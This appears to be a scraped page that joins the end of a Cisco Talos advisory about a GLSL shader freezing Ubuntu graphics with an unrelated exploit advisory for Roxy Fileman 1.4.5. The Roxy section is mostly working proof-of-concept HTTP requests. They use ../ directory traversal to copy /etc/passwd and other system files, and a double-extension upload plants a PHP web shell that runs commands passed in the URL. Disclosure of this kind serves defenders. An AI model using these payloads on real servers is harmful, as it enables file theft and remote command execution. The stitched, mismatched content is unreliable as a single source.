        return xout;
        
    }
     
    float func3(vec3 position) {
        
        vec3 var_1 = floor(position);
     
        float var_dummy[8];
        for (float z=0.0; z<2.0; z++) {
            for (float y=0.0; y<2.0; y++) {
                for (float x=0.0; x<2.0; x++) {
                    vec3 var_pos = var_1 + vec3(x, y, z);
                    vec3 var_vector = func4(var_pos.x);
                    var_dummy[int((z*4.0) + (y*2.0) + x)] = dot(var_vector, var_vector);
                }
            }
        }
        
        return var_dummy[0];
    }
    
    
    const float var_2 = 0.24;
    
    float func2(float var_2) {
      if (time < 1.0) return var_2;
      else return -1.0;
    }
    
    
    void main() {
      float t = func2(var_2);
      vec4 color;
    
      if (t == -1.0) {
          vec3 noisePoint = vec3(time*0.01, time*0.2, time*0.3); 
          vec4 color = vec4(0.1, 0.1, 0.1, 1.0);
          color.rgb *= 1.0 - func3(noisePoint);
          gl_FragColor = color;
          return ;
      }
      gl_FragColor = color;
    

The analysis of this bug mostly relies on assumptions since there is no kernel crash (crash dump information) to investigate. The Ubuntu graphics interface just freezes. We assume that the GPU shader is consuming too many resources and eventually renders the machine unusable. At this point, a watchdog mechanism should step in, but for some unknown reason, it doesn’t. The same vulnerability does not trigger on other systems (for example Windows) and even on Ubuntu Linux itself. Proprietary Nvidia drivers are not vulnerable to this attack.

**Timeline**

2018-08-03 - Vendor Disclosure  
2018-09-26 - 2nd Vendor follow up  
2018-09-28 - Vendor acknowledged; Copy of report emailed to point of contact assigned  
2018-10-11 - 3rd copy of report sent; vendor claimed issues with receiving file via email  
2018-10-15 - 4th copy of report sent  
2018-11-05 - Vendor advised report under review  
2018-12-10 - Vendor advised “issues are known already”  
2019-01-10 - 90+ day follow up (125 days)  
2019-03-26 - Public Release

Discovered by Piotr Bania of Cisco Talos.

CVE-2018-3979: TALOS-2018-0647 || Cisco Talos Intelligence Group

Roxy Fileman 1.4.5 allows Directory Traversal in copydir.php, copyfile.php, and fileslist.php.

    ======================================================================
    Exploit Title:: Multiple Vulnerabilities
    Software: Roxy Fileman
    Version: 1.4.5
    Vendor Homepage: http://www.roxyfileman.com/
    Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-php
    CVE number: CVE-2018-20525, CVE-2018-20526
    Found: 2018-12-07
    Tested on: PHP 7.0, Ubuntu 16.04 LTS
    Author: Pongtorn Angsuchotmetee, Vittawat Masaree
    SnoopBees Lab
    https://www.snoopbees.com
    =======================================================================
    Description
    ===============================================================
    Roxy Fileman is free open source file browser for .NET and PHP, ready for
    use with CKEditor and TinyMCE WYSIWYG html editors. It could be easily
    integrated into a CMS or any other web application. Fileman is based on
    JQuery and JQueryUI libraries and it's compatible with all modern browsers
    - Internet Explorer, Firefox, Google Chrome, Safary and Opera.
    
    Roxy Fileman is designed to be as flexible as possible. The client
    interface is completely separated from the server-side logic and scripts,
    thus can be used with any server programming language - PHP, ASP .NET,
    Python, Cold Fusion etc. All data exchanged including configuration and
    language files is in light weight JSON format. Great performance - all data
    from the server is loaded using Ajax without page reloading. Fileman has
    ready to use distributions for PHP and .NET. All client-server
    communications and configuration files are in JSON format and are language
    independent. See custom server side scripts.
    Ref: http://www.roxyfileman.com/
    
    Vulnerability
    ==================================
    
       1. Path Traversal (CVE-2018-20525)
       2. Unrestricted File Upload (CVE-2018-20526)
    
    ==================================
    
    Proof of Concept
    ===========================
    1) Path Traversal (CVE-2018-20525)
    ==================================
    The vulnerability affected file “copydir.php", “copyfile.php",
    “fileslist.php". It is we can manipulating variables that reference files
    with “dot-dot-slash (../)”  to access arbitrary files and directories
    access on file system. After copied the system file will appear on Roxy
    file manager “http://[IP-Address]/fileman/Uploads".
    
    #################################################
    ----------------------------------------------------------------------------------
    
    1.1. copydir.php
    
    POST /fileman/php/copydir.php HTTP/1.1
    Host: 10.10.10.190
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0)
    Gecko/20100101 Firefox/64.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://10.10.10.190/fileman/index.html
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 78
    Connection: close
    Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af;
    roxyld=%2Ffileman%2FUploads%2FImages; roxyview=list
    
    d=%2Ffileman%2FUploads%2F*/../../../../../../../../etc/*&n=%2Ffileman%2FUploads/
    
    
    ----------------------------------------------------------------------------------
    
    
    1.2. copyfile.php
    
    POST /fileman/php/copyfile.php HTTP/1.1
    Host: 10.10.10.190
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0)
    Gecko/20100101 Firefox/64.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://10.10.10.190/fileman/index.html
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 66
    Connection: close
    Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af;
    roxyld=%2Ffileman%2FUploads%2FImages; roxyview=list
    
    f=%2Ffileman%2FUploads%2F*/../../../../../../../../etc/passwd*&type=
    ----------------------------------------------------------------------------------
    
    
    1.3. filelist.php
    
    POST /fileman/php/fileslist.php HTTP/1.1
    Host: 10.10.10.190
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0)
    Gecko/20100101 Firefox/64.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://10.10.10.190/fileman/index.html
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 65
    Connection: close
    Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af;
    roxyld=%2Ffileman%2FUploads%2FImages; roxyview=list
    
    d=%2Ffileman%2FUploads%2FImages*/../../../../../../../../etc*&type=
    
    ##############################################################
    ============================
    2) Unrestricted File Upload (CVE-2018-20526)
    ==================================
    The vulnerability affected file upload.php and in the condition that the
    php.ini file need have add the “*AddHandler php7-script .php*”. And now we
    can upload the shell code file to the server by double extension such
    as *shellcode.php.png
    *
    
    --------------------------------------------------------------------------------------------------------------------
    
    POST /fileman/php/upload.php HTTP/1.1
    Host: 10.10.10.190
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0)
    Gecko/20100101 Firefox/64.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://10.10.10.190/fileman/index.html
    Content-Type: multipart/form-data;
    boundary=---------------------------67141620012509
    Content-Length: 547
    Connection: close
    Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af; roxyld=%2Ffileman%2FUploads;
    roxyview=list
    
    -----------------------------67141620012509
    Content-Disposition: form-data; name="action"
    
    upload
    -----------------------------67141620012509
    Content-Disposition: form-data; name="method"
    
    ajax
    -----------------------------67141620012509
    Content-Disposition: form-data; name="d"
    
    /fileman/Uploads
    -----------------------------67141620012509
    Content-Disposition: form-data; name="files[]"; filename="*phpshell.php.png*"
    
    Content-Type: image/png
    
    *<?php system($_GET[cmd]); ?> *
    -----------------------------67141620012509--
    
    -------------------------------------------------------------------------------------------------------------------------------------------
    
    
    Timeline
    ==================================
    2018-12-07: Discovered the bug
    2018-12-11: Reported to vendor (The vendor is unresponsive)
    2018-12-19: Reported to vendor (The vendor is unresponsive)
    2018-12-27: Request CVE
    2019-01-03: Advisory published
    
    Discovered By:
    =====================
    Pongtorn Angsuchotmetee, Vittawat Masaree

Tag

#firefox